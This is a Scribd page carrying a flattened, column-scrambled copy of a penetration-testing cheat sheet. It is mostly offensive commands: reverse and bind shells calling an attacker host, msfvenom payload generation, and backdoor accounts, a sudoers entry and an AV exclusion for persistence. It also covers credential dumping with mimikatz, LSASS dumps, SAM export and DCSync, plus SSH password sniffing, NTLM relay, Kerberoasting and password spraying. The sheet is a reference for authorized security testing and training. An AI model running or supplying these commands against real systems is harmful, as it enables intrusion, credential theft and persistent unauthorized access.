Scribd
Upload
765 views3 pages

Hacking Tools Cheat Sheet 2023

This document provides a cheat sheet of hacking tools covering basic Linux networking commands, information gathering techniques, network scanning, sniffing, IP and TCP tools, TLS, shells, and performance tuning for nmap scans. It lists commands and filters for tasks like viewing IP configurations, changing the MAC address, DNS lookups, port scanning, ARP spoofing, TLS servers, bind shells and reversing shells.

Uploaded by

Agung Sagita Purnama
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
765 views3 pages

Hacking Tools Cheat Sheet 2023

This document provides a cheat sheet of hacking tools covering basic Linux networking commands, information gathering techniques, network scanning, sniffing, IP and TCP tools, TLS, shells, and performance tuning for nmap scans. It lists commands and filters for tasks like viewing IP configurations, changing the MAC address, DNS lookups, port scanning, ARP spoofing, TLS servers, bind shells and reversing shells.

Uploaded by

Agung Sagita Purnama
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Specify target via CIDR 10.5.23.

0/24, ranges Useful tcpdump filters: HTTP


Hacking Tools Cheat Sheet 10.13-37.5.1-23 or input file -iL [Link]. ▪ not arp: No ARP packets
Start Python webserver on port 2305:
v2.0, September 2023, Compass Security
Reverse DNS lookup of IP address range: ▪ port ftp or port 23: Only port 21 or 23
[Link] $ python3 -m [Link] 2305
# nmap -sL [Link]/24 ▪ host [Link]: Only from/to host
▪ net [Link]/24: Only from/to networks Start webserver for data up/download:
Basic Linux Networking ARP host discovery: $ goshs -s -ss -p 2305 -b user:hunter2
# nmap -n -sn -PR [Link]/24 Use tshark or Wireshark for advanced sniffing.
Show IP configuration: Perform HTTP request:
$ ip addr show Host discovery (ARP, ICMP, SYN 443, ACK 80): Sniffing over SSH on a remote host: $ curl [Link]
# nmap -sn -n [Link]/24 $ ssh [Link] sudo tcpdump -w- port
Change MAC address: not ssh | wireshark -k -i - Useful curl options:
# ip link set dev eth0 down SYN scan (half-open scan = SYN/SYN-ACK/RST): ▪ -k: Accept untrusted certificates
# nmap -Pn -n -sS -p 22,80 [Link] Search in traffic, show HTTP traffic or images:
# macchanger -m [Link] eth0 ▪ -d "foo=bar": HTTP POST data
# ngrep -i pass; urlsnarf; driftnet
# ip link set dev eth0 up List nmap scripts: ▪ -H: "Foo: Bar": HTTP header
Static IP address configuration: $ ls /usr/share/nmap/scripts ▪ -I: Perform HEAD request
IP
# ip addr add [Link]/24 dev eth0 Scan for EternalBlue vulnerable hosts: ▪ -L: Follow redirects
# ip route add default via [Link] # nmap -n -Pn -p 443 --script smb- Test IP forwarding for a specific MAC address: ▪ -o [Link]: Write output file
DNS and reverse DNS lookup: # nping -e eth0 --tcp -p 443 --dest-
vuln-ms17-010 [Link]/24 ▪ --proxy [Link] Set proxy
mac [Link] [Link]
$ dig [Link] Scan for vulnerabilities (script category filter): Scan for common files/applications/configs:
$ dig -x [Link] # nmap -n -Pn --script "vuln and safe"
TCP # nikto -host [Link]
[Link]/24
Information Gathering Listen on TCP port: Enumerate common directory-/filenames:
Run script on non-default port using +: $ feroxbuster -u [Link]
Find owner of domain or IP address: $ ncat -vnlp 2305
# nmap -n -Pn -p 80 --script +http- -w [Link]
$ whois [Link] title [Link] Connect to TCP port:
$ ncat -v [Link] 2305 Get wordlists (raft*, wellknown*, quickhits):
Get nameservers and try DNS zone transfer: Performance Tuning (1 SYN packet ≈ 60 bytes ▪ GitHub danielmiessler/SecLists
$ dig [Link] ns → 20'000 packets/s ≈ 10 Mbps): ▪ GitHub fuzzdb-project/fuzzdb
$ dig [Link] axfr @[Link] TLS
# nmap -n -Pn --min-rate 20000
Use multiple sources for hostname discovery: [Link]/24 Create self-signed certificate:
Shells
# openssl req -x509 -newkey rsa:2048
$ subfinder -d [Link] -all Public internet scan databases:
-keyout [Link] -out [Link] -nodes Start bind shell (on victim):
Sources for hostname / subdomain discovery: ▪ [Link], [Link] -subj "/CN=[Link]/" $ ncat -vnlp 2305 -e "/bin/bash -i"
▪ [Link], [Link], [Link]
Sniffing Start TLS Server: Connect to bind shell (on attacker):
$ openssl s_server -cert [Link] -key $ ncat -v [Link] 2305
Network Scanning ARP spoofing: [Link] -port 2305
Listen for reverse shell (on attacker):
Useful nmap options: # arpspoof -t [Link] [Link] $ ncat --ssl -l -p 2305 --ssl-cert
$ ncat -vnlp 2305
▪ -n: Disable name and port resolution GUI version: [Link] --ssl-key [Link]
▪ -PR: ARP host discovery Start reverse shell (on victim):
# ettercap -G Connect to TLS service:
$ ncat -e "/bin/bash -i" [Link] 2305
▪ -Pn: Disable host discovery Show / delete ARP cache: $ openssl s_client -connect
$ bash -i &>/dev/tcp/[Link]/42 0>&1
▪ -sn: Disable port scan (host discovery only) $ ip neigh show [Link]:2305
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan # ip neigh flush all $ ncat --ssl [Link] 2305 More shells on [Link].
▪ --top-ports 50: Scan 50 top ports Sniff traffic: Show certificate details of full chain: Upgrade to more functional pseudo terminal:
▪ -iL file: Host input file # tcpdump [options] [filters] $ openssl s_client -showcerts -connect victim $ python -c 'import pty;
▪ -oA file: Write output files (3 file formats) [Link]:2305 | openssl x509 -text [Link]("/bin/bash")'
Useful tcpdump options: victim $ ^Z # press Ctrl-Z
▪ -sC: Script scan (default scripts) ▪ -i interface: Interface or any for all Test TLS server certificate and protocols/ciphers:
attacker $ stty -a # get ROWS/COLS
▪ --script <file/category>: Specific scripts ▪ -n: Disable name and port resolution
$ sslyze [Link]
attacker $ stty raw -echo
▪ -sV: Version detection ▪ -A: Print in ASCII TCP to TLS proxy: attacker $ fg # press enter twice
▪ -6: IPv6 scan ▪ -XX: Print in hex and ASCII $ socat TCP-LISTEN:2305,fork,reuseaddr victim $ stty rows <ROWS> cols <COLS>
▪ --open: Do not wait for RST (improves speed) ▪ -w file: Write output PCAP file
ssl:[Link] victim $ export TERM=xterm-256color
▪ -v/-d: Verbose / debugging output ▪ -r file: Read PCAP file Online TLS tests: [Link], [Link]

Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, [Link] 1
Vulnerability DBs and Exploits msf > sessions 2 # interact Windows Privilege Escalation Scan for network shares:
meterpreter > sysinfo # use it $ [Link] --host-file [Link] -u
Exploit search (local copy of the Exploit-DB): Bypass PowerShell execution policy:
$ searchsploit apache File exchange / execute binary: PS > Set-ExecutionPolicy -Policy
Administrator -p PasswordOrHash
meterpreter > upload [Link] bypass -Scope process
Show exploit file path and copy it into clipboard: meterpreter > download c:\[Link] Windows Credentials Gathering
$ searchsploit -p 40142 meterpreter > execute -i -f /your/bin Use AMSI bypasses from [Link].
Start Mimikatz and create log file:
Online vulnerability and exploit databases: Port forwarding to localhost: Check for common privesc techniques: C:\> [Link]
▪ [Link], [Link], meterpreter > portfwd add -l 2323 -p ▪ GitHub carlospolop/PEASS-ng → winPEAS mimikatz # log C:\tmp\[Link]
[Link] 3389 -r [Link] ▪ GitHub itm4n/PrivescCheck
mimikatz # privilege::debug
Background Meterpreter session: ▪ GitHub PowerShellMafia/PowerSploit → Show passwords/hashes of logged in users:
Cracking meterpreter > background mimikatz# sekurlsa::logonpasswords
PowerUp.ps1
Online brute force SSH passwords: Pivoting through existing Meterpreter session: Dump [Link] using taskmgr or:
Exploit WSUS updates delivered via HTTP:
# ncrack -p 22 --user root -P msf > use post/multi/manage/autoroute PS > (Get-Process -Name lsass).Id
$ pywsus --host [Link] --port 8530
[Link] [Link]/24 msf > set session 2 # meterpreter sess PS > [Link] -accepteula -ma
--executable /opt/[Link] --
Determine hash type: msf > run <pid> c:\[Link]
command '/accepteula /s [Link] /c
# hashid 869d[...]bd88 msf > route PS > [Link]
"[Link] -encodedCommand J[…]"'
C:\windows\System32\[Link]
Show example hash types for hashcat: SOCKS via Meterpreter (requires autoroute): Add new local admin to persist after privesc: MiniDump <pid> C:\[Link] full
$ hashcat --example-hashes msf > use auxiliary/server/socks4a C:\> net user backdoor hunter2
msf > set SRVPORT 8080 Read LSASS process dump:
Crack hashes (e.g. type 1000 for NTLM): C:\> net localgroup Administrators
msf > run mimikatz# sekurlsa::minidump [Link]
$ hashcat -m 1000 -a 0 [Link] -r backdoor /add
$ pypykatz lsa minidump [Link]
[Link] /opt/wordlists/* Configure ProxyChains: Add AV exclusion:
# vi /etc/[Link] Dump LSASS remotely:
Crack hashes using John the Ripper: PS > Add-MpPreference -ExclusionPath
[...] $ lsassy -u admin -H e8[…]97 hostname
$ john --wordlist=[Link] [Link] C:\tmp\
socks4 [Link] 1080 Export SYSTEM & SAM hive for local users:
Metasploit Framework Connect through SOCKS proxy: Active Directory C:\> reg save HKLM\SYSTEM [Link]
# proxychains ncat [Link] 2305 C:\> reg save HKLM\SAM [Link]
Start Metasploit, search & use exploit: Start process with network credentials:
C:\> runas /netonly Dump hashes from SYSTEN & SAM file:
# msfconsole Linux Privilege Escalation mimikatz# lsadump::sam
msf > search eternalblue /user:[Link]\alice [Link]
msf > use exploit/windows/smb/ms17_… Check for common privesc techniques: Analyze AD & create report using PingCastle:
/system:[Link] /sam:[Link]
$ [Link] -sam [Link] -system
msf exploit(…) > show options ▪ GitHub carlospolop/PEASS-ng → linPEAS C:\> [Link] --healthcheck -- [Link] local
msf exploit(…) > set TARGET [Link] ▪ GitHub rebootuser/LinEnum explore-trust --explore-forest-trust
msf exploit(…) > exploit Dump local user hashes remotely:
▪ GTFOBins: [Link] --no-enum-limit
$ [Link]
Generate reverse shell (WAR): Set SUID bit to shell and start root shell: Gather BloodHound data using SharpHound: [Link]/alice:hunter2@hostname
$ msfvenom -p # chmod +s $(which sh) C:\> [Link] -c $ crackmapexec -u admin --local-auth
java/jsp_shell_reverse_tcp LHOST=<your $ sh -p All,GPOLocalGroup -H :01[…]D03 [Link]/24 –sam
ip address> LPORT=443 -f war > [Link]
Add SUDO backdoor user: Query AD using PowerView: DCSync:
Reverse shell listener: # echo "user ALL=(ALL:ALL) NOPASSWD: PS > Import-Module PowerView.ps1 $ [Link] -just-dc -just-dc-
msf > use exploit/multi/handler ALL" >> /etc/sudoers.d/README PS > Get-Domain user alice [Link]/admin:s3cret@dc
msf > set payload PS > Get-DomainUser mimikatz # lsadump::dcsync /user:alice
linux/x64/shell_reverse_tcp PS > Get-DomainTrust
Lateral Movement Linux
msf > set LHOST [Link] # attacker PS > Get-DomainComputer Pass-the-Hash
msf > set LPORT 443 Sniff SSH passwords: PS > Get-DomainController
msf > exploit # strace -p "$(pgrep -f PS > Get-DomainGroupMember -Recurse Remote shell:
Upgrade to Meterpreter: /usr/sbin/sshd)" -f -e trace=write -Identity "Domain Admins" $ [Link] -hashes :23[…]05
background # or press Ctrl-Z ^Z SSH agent hijacking: domain/username@[Link]
background session 1? [y/N] y # export SSH_AUTH_SOCK=/tmp/ssh…/agent Network Shares Alternatives: [Link], [Link].
msf > sessions # list sessions # ssh-add -l Search for juicy files on domain joined systems:
msf > sessions -u 1 # upgrade C:\> [Link] -s -o [Link]
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, [Link] 2
Access shares: mimikatz# misc::spooler misc::spooler S4U2Self (machine account to local admin): Remove certificate to cleanup:
$ [Link] -hashes :23[…]05 /connect:victim /server:attacker C:\> [Link] asktgt /nowrap C:\> [Link] clean /target:alice
[Link]/alice@[Link] Coerce via PetitPotam (EFS remote protocol): /domain:[Link] /user:"MYHOST$"
Spray hash over a subnet: $ [Link] -u alice -p hunter2 -d /aes256:23[...]05 Active Directory Certificate Services
[Link] attacker victim C:\> [Link] s4u /self /nowrap
$ crackmapexec smb [Link]/24 -u
/impersonateuser:domainadmin List CAs & find vulnerable templates:
alice -d [Link] -H 23[…]05 mimikatz# misc::efs /connect:victim C:\> [Link] cas
/server:attacker /altservice:cifs/[Link]
Enable restricted admin mode: /ticket:doI[…]= C:\> [Link] find /vulnerable
PS > New-ItemProperty -Path Coerce using multiple different techniques: Request certificate with specified subject:
HKLM:\System\CurrentControlSet\Control $ [Link] coerce -u alice -p Kerberoasting C:\> [Link] request
\Lsa -Name DisableRestrictedAdmin hunter2 --target victim --listener-ip /ca:[Link]\CA /template:ESC1
-Value 0 -PropertyType DWORD -Force attacker Get users with SPN: /altname:bob /install
PS > Get-DomainUser -SPN
RDP (requires restricted admin mode): Use certificate to get Kerberos ticket:
Password Spraying Kerberoast (hashcat mode 13100):
$ xfreerdp /u:alice /d:[Link] C:\> [Link] asktgt /ptt /user:bob
/pth:23[…]05 /v:[Link] Display password policy: C:\> [Link] kerberoast /certificate:[Link] /password:hunter2
C:\> net accounts /domain /outfile:[Link]
RDP using mimikatz: /domain:[Link] /dc:[Link]
mimikatz# sekurlsa::pth /user:alice Password spraying for all domain users: Get users which do not require preauth: NTLM relay to HTTP enrollment endpoint:
/domain:[Link] /ntlm: 23[…]05 C:\> [Link] brute /password:s3cret PS > Get-DomainUser -UACFilter $ [Link] -t
/run:"[Link] /restrictedadmin" DONT_REQ_PREAUTH
Password spraying for certain users: [Link]
C:\> [Link] brute /users:[Link] AS-REP roast (hashcat mode 18200): -smb2support --adcs --template Machine
NTLM Relay /passwords:[Link] C:\> [Link] asreproast
Vulnerable if message signing disabled: $ kerbrute passwordspray --dc [Link] /format:hashcat /outfile:[Link] MS SQL
# nmap -n -Pn -p 445 --script smb- -d [Link] [Link] hunter2 Use PowerUpSQL & get instances:
security-mode [Link]/24 Kerberos Delegation
PS > Import-Module PowerUpSQL.ps1
Kerberos Get unconstrained delegation systems:
Generate relay list: PS > $t = Get-SQLInstanceDomain | Get-
$ crackmapexec smb [Link]/24 --gen- List Kerberos tickets: PS > Get-DomainComputer -Unconstrained SQLConnectionTest | ? { $_.Status -eq
relay-list [Link] C:\> klist Watch for forwardable tickets: "Accessible" }; $t
Disable SMB and HTTP in [Link] and C:\> [Link] klist C:\> [Link] monitor /interval:10 Get information & vulnerabilities:
C:\> [Link] triage /nowrap PS > $t | Get-SQLServerInfo
start Responder for LLMNR/NBT-NS poisoning:
# responder -I eth0 Dump Kerberos keys: Coerce DC, import ticket & DCSync to privesc. PS > $t | Invoke-SQLAudit -v

NTLM Relay to target and extract SAM file:


mimikatz# sekurlsa::ekeys
Get constrained delegation systems: Coerce (alternatively xp_fileexist):
# [Link] -smb2support Get TGT for current user: PS > Get-DomainUser -TrustedToAuth PS > Get-SQLQuery -Verbose -Query
-t smb://[Link] C:\> [Link] tgtdeleg PS > Get-DomainComputer -TrustedToAuth "EXEC [Link].xp_dirtree
'\\[Link]\x,1, 1" -Instance
NTLM Relay using socks proxy: Get TGT for specific user: Get ST using constrained delegation account: "[Link],1433"
# [Link] -tf [Link] C:\> [Link] asktgt /user:alice C:\> [Link] s4u
-smb2support -socks /domain:[Link] /password:pwd /ptt /domain:[Link] /user:sql_user Command execution (requires sysadmin):
PS > Invoke-SQLOSCmd -Command "whoami"
Configure ProxyChains & access files via proxy: Pass-the-key using /rc4, /aes128 or /aes256. /rc4:23[…]05 /impersonateuser:alice
-Rawresults -Instance "mssql…,1433"
$ proxychains [Link] /msdsspn:cifs/[Link]
Pass-the-Ticket: /altservice:host /ptt /nowrap
[Link]/alice:InvalidPw@[Link] C:\> [Link] ptt /ticket:doI[…]= Useful Online Resources
Dump tickets (luid from rubeus klist) DACL / Shadow Credentials ▪ Compass Link Collection: [Link]/secres
Coercion / Connection Triggering
C:\> [Link] dump /luid:0x234205 ▪ The Hacker Recipes: [Link]
Coerce via shortcut file ([Link]): Use GenericAll/GenericWrite to add certificate:
/nowrap ▪ The Hacker Tools: [Link]
[InternetShortcut] C:\> [Link] add /target:alice
Import ticket: ▪ Hacktricks: [Link]
URL=[Link] Get NTLM hash via PKINIT/U2U: ▪ Red Team Notes: [Link]
C:\> [Link] ptt /ticket:doI[…]=
IconIndex=0 C:\> [Link] asktgt /user:alice
IconFile=\\[Link]\[Link] Get ST: ▪ Get the latest cheat sheet version at GitHub:
/certificate:MI[…]= /password:hunter2
C:\> [Link] asktgs /ticket:doI[…]= /domain:[Link] /dc:[Link] CompassSecurity/Hacking_Tools_Cheat_Sheet
Coerce via PrinterBug (Print Spooler Service):
/service:cifs/[Link] /ptt /getcredentials /show v2.0, September 2023, Compass Security
$ [Link]
[Link]/alice:pwd@victim attacker [Link]
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, [Link] 3

You might also like